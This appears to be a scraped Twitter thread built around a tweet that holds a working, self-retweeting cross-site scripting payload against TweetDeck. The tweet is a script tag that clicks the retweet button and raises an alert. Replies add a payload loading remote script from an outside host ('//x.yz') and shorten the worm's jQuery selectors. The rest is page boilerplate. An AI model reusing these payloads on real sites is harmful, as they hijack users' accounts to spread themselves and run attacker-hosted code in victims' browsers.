<script class="xss">$('.xss').parents().eq(1).find('a').eq(1).click();$('[data-action=retweet]').click();alert('XSS in Tweetdeck')</script>
-
-
-
@mathias <script src=//x.yz></script>
? - 1 more reply
New conversation -
-
-
-
@vierbergenlars Nice one! `$('.cf .btn:eq(1)')` is even shorter. - 4 more replies
New conversation -
-
-
-
@Prinzhorn That doesn’t work, as the `[data-action$=t]` is not in the DOM (and thus won’t be selected) until the first click happens. - 1 more reply
New conversation -
Loading seems to be taking a while.
Twitter may be over capacity or experiencing a momentary hiccup. Try again or visit Twitter Status for more information.